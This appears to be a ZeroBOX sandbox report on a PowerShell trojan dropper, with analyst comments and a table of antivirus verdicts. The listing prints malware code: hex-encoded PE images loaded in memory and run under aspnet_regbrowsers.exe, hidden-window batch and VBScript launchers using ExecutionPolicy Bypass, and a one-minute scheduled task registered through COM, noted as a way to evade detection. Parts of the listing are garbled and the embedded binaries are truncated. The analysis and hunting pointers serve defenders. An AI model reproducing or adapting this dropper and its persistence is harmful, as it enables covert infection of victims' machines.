Static | ZeroBOX
No static analysis available.
# Analyst notes (dropper script as captured by the sandbox).
# Each `$Content = @'` opens a single-quoted here-string that a later
# [IO.File]::WriteAllText call saves to disk. The closing '@ terminators and some
# closing parentheses are absent from this listing (presumably lost in extraction),
# so the text does not parse as shown.
#
# This first here-string is the payload stage saved as C:\Users\Public\Videos\IPTV.ps1:
#   - $trobs / $wyzzwy are '/='-delimited hex strings. Both start with 4D 5A ("MZ")
#     and contain 50 45 00 00 ("PE\0\0"), i.e. two embedded PE images (truncated here).
#   - Each string is split on '/=' and converted to a byte array ($bbb, $pe).
#   - $pe is loaded from memory with [Reflection.Assembly]::Load; no write of these
#     bytes to disk appears in the visible lines.
#   - Method 'Execute' of type 'NewPE.PE' is resolved and invoked statically ($null
#     target) with two arguments: the path
#     C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe and $bbb.
#     NOTE(review): Execute's body is not visible; passing a host executable path plus
#     raw PE bytes suggests $bbb is run under that .NET Framework utility - confirm by
#     analysing the assembly in $pe.
#   - The `-replace '', ''` calls are no-ops as written (empty pattern, empty replacement).
# Triage pointers: because the assembly is loaded from a byte array, rely on PowerShell
# script block logging / AMSI content and on unexpected aspnet_regbrowsers.exe process
# starts rather than on a dropped binary.
$Content = @'
$trobs = "4D/=5A/=90/=00/=03/=00/=00/=00/=04/=00/=00/=00/=FF/=FF/=00/=00/=B8/=00/=00/=00/=00/=00/=00/=00/=40/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=80/=00/=00/=00/=0E/=1F/=BA/=0E/=00/=B4/=09/=CD/=21/=B8/=01/=4C/=CD/=21/=54/=68/=69/=73/=20/=70/=72/=6F/=67/=72/=61/=6D/=20/=63/=61/=6E/=6E/=6F/=74/=20/=62/=65/=20/=72/=75/=6E/=20/=69/=6E/=20/=44/=4F/=53/=20/=6D/=6F/=64/=65/=2E/=0D/=0D/=0A/=24/=00/=00/=00/=00/=00/=00/=00/=50/=45/=00/=00/=4C/=01/=03/=00/=76/=6A/=7A/=64/=00/=00/=00/=00/=00/=00/=00/=00/=E0/=00/=02/=01/=0B/=01/=08/=00/=00/=F0/=00/=00/=00/=0A/=00/=00/=00/=00/=00/=00/=2E/=0E/=01/=00/=00/=20/=00/=00/=00/=20/=01/=00/=00/=00/=40/=00/=00/=20/=00/=00/=00/=02/=00/=00/=04/=00/=00/=00/=00/=00/=00/=00/=04/=00/=00/=00/=00/=00/=00/=00/=00/=60/=01/=00/=00/=02/=00/=00/=00/=00/=00/=00/=02/=00/=60/=85/=00/=00/=10/=00/=00/=10/=00/=00/=00/=00/=10/=00/=00/=10/=00/=00/=00/=00/=00/=00/=10/=00/=00/=00/=00/=00/=00/=00/=00/=00
$wyzzwy = "4D/=5A/=90/=00/=03/=00/=00/=00/=04/=00/=00/=00/=FF/=FF/=00/=00/=B8/=00/=00/=00/=00/=00/=00/=00/=40/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=80/=00/=00/=00/=0E/=1F/=BA/=0E/=00/=B4/=09/=CD/=21/=B8/=01/=4C/=CD/=21/=54/=68/=69/=73/=20/=70/=72/=6F/=67/=72/=61/=6D/=20/=63/=61/=6E/=6E/=6F/=74/=20/=62/=65/=20/=72/=75/=6E/=20/=69/=6E/=20/=44/=4F/=53/=20/=6D/=6F/=64/=65/=2E/=0D/=0D/=0A/=24/=00/=00/=00/=00/=00/=00/=00/=50/=45/=00/=00/=4C/=01/=03/=00/=28/=F3/=56/=8C/=00/=00/=00/=00/=00/=00/=00/=00/=E0/=00/=0E/=21/=0B/=01/=30/=00/=00/=DC/=02/=00/=00/=06/=00/=00/=00/=00/=00/=00/=2E/=FB/=02/=00/=00/=20/=00/=00/=00/=00/=03/=00/=00/=00/=40/=00/=00/=20/=00/=00/=00/=02/=00/=00/=04/=00/=00/=00/=00/=00/=00/=00/=06/=00/=00/=00/=00/=00/=00/=00/=00/=40/=03/=00/=00/=02/=00/=00/=00/=00/=00/=00/=03/=00/=60/=85/=00/=00/=10/=00/=00/=10/=00/=00/=00/=00/=10/=00/=00/=10/=00/=00/=00/=00/=00/=00/=10/=00/=00/=00/=00/=00/=00/=00/=00/=0
Sleep 5
[Byte[]] $bbb = $trobs -split '/=' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) }
[Byte[]] $pe = $wyzzwy -split '/=' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) }
$YIX = [Reflection.Assembly]::Load($pe)
$gss = $YIX.GetType('NewPE.PE' -replace '', '')
$IRW = $gss.GetMethod('Execute')
$KEZ = 'C:\Windows\Micr' -replace '', ''
$ODW = $KEZ + 'osoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe' -replace '', ''
$WYZU = @(
$ODW,
$bbb
$IUWS = $IRW.Invoke(
$null,
[object[]] $WYZU
[IO.File]::WriteAllText("C:\Users\Public\Videos\IPTV.ps1", $Content)
# The call above writes the preceding here-string to IPTV.ps1 in the Public profile's
# Videos folder.
# The here-string opened below is a batch launcher: it builds the command line
#   powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& '<IPTV.ps1>'"
# and exits. Its first line reads `@e%IPTV%%IPTV% off` in this capture.
# NOTE(review): %IPTV% is not set anywhere in the visible lines; this looks like a
# token-splitting obfuscation of `@echo off` that was partly garbled - confirm against
# the raw sample.
# Triage pointer: the hidden-window + ExecutionPolicy Bypass combination targeting a
# script under C:\Users\Public\ is a usable command-line hunting pattern.
$Content = @'
@e%IPTV%%IPTV% off
set "ps=powershell.exe"
set "params=-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass"
set "cmd=C:\Users\Public\Videos\IPTV.ps1"
%ps% %params% -Command "& '%cmd%'"
exit /b
[IO.File]::WriteAllText("C:\Users\Public\Videos\IPTV.bat", $Content)
# The call above writes the batch launcher to IPTV.bat in the same folder.
# The here-string opened below is VBScript. As written it:
#   - sets `on error resume next`, so failures are silently ignored;
#   - creates a WScript.Shell object;
#   - calls .Run on C:\Users\Public\Videos\IPTV.bat with window style 0 (hidden window).
# The small wrapper functions only return constants (object name, file path, 0).
$Content = @'
on error resume next
Function CreateWshShellObj()
Dim objName
objName = "WScript.Shell"
Set CreateWshShellObj = CreateObject(objName)
End Function
Function GetFilePath()
Dim filePath
filePath = "C:\Users\Public\Videos\IPTV.bat"
GetFilePath = filePath
End Function
Function GetVisibilitySetting()
Dim visibility
visibility = 0
GetVisibilitySetting = visibility
End Function
Function RunFile(wshShellObj, filePath, visibility)
wshShellObj.Run filePath, visibility
End Function
Set wshShellObj = CreateWshShellObj()
filePath = GetFilePath()
visibility = GetVisibilitySetting()
Call RunFile(wshShellObj, filePath, visibility)
[IO.File]::WriteAllText("C:\Users\Public\Videos\IPTV.vbs", $Content)
# The call above writes the VBScript launcher to IPTV.vbs. Resulting chain, per the
# visible lines: scheduled task -> IPTV.vbs -> IPTV.bat (hidden) -> powershell.exe
# (hidden, ExecutionPolicy Bypass) -> IPTV.ps1 -> in-memory assembly load.
Sleep 2
# Persistence: register a scheduled task through the Task Scheduler COM API
# (Schedule.Service) instead of schtasks.exe or the ScheduledTasks cmdlets, so
# command-line detections keyed on those tools will not see the registration.
$scheduler = New-Object -ComObject Schedule.Service
$scheduler.Connect()
# NewTask takes a reserved flags argument, passed as 0.
$taskDefinition = $scheduler.NewTask(0)
$taskDefinition.RegistrationInfo.Description = "Runs a script every 1 minutes"
$taskDefinition.Settings.Enabled = $true
# Allow the task to start while the machine is on battery power.
$taskDefinition.Settings.DisallowStartIfOnBatteries = $false
$trigger = $taskDefinition.Triggers.Create(1) # 1 = TimeTrigger
# Trigger starts at registration time and repeats every minute (ISO 8601 "PT1M");
# no Repetition.Duration is set in the visible lines.
$trigger.StartBoundary = [DateTime]::Now.ToString("yyyy-MM-ddTHH:mm:ss")
$trigger.Repetition.Interval = "PT1M"
# NOTE(review): the bare word on the next line looks like a comment whose leading
# '#' was lost in extraction; as shown it is not valid as a comment.
Action
$action = $taskDefinition.Actions.Create(0) # 0 = ExecAction
# The action path is the .vbs file itself, with no interpreter named.
# NOTE(review): presumably started via the Windows Script Host file association - confirm.
$action.Path = "C:\Users\Public\Videos\IPTV.vbs"
# Task is registered in the root folder ("\") under the name "IPTV".
# Argument 6 = TASK_CREATE_OR_UPDATE (overwrites an existing task of the same name);
# user and password are $null; 3 = TASK_LOGON_INTERACTIVE_TOKEN.
# Triage pointers: a root-folder task named "IPTV" with a one-minute repetition whose
# action points into C:\Users\Public\Videos\; task-creation audit events (Security 4698,
# where auditing is enabled) and the TaskScheduler operational log record the registration.
$taskFolder = $scheduler.GetFolder("\")
$taskFolder.RegisterTaskDefinition("IPTV", $taskDefinition, 6, $null, $null, 3)
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 PowerShell/TrojanDropper.Agent.AEL
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.PowerShell.Generic
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Emsisoft Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
FireEye Clean
Sophos Clean
GData Clean
Jiangmin Clean
Varist Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.PowerShell.Generic
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Trojan-Dropper.PowerShell.Agent
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.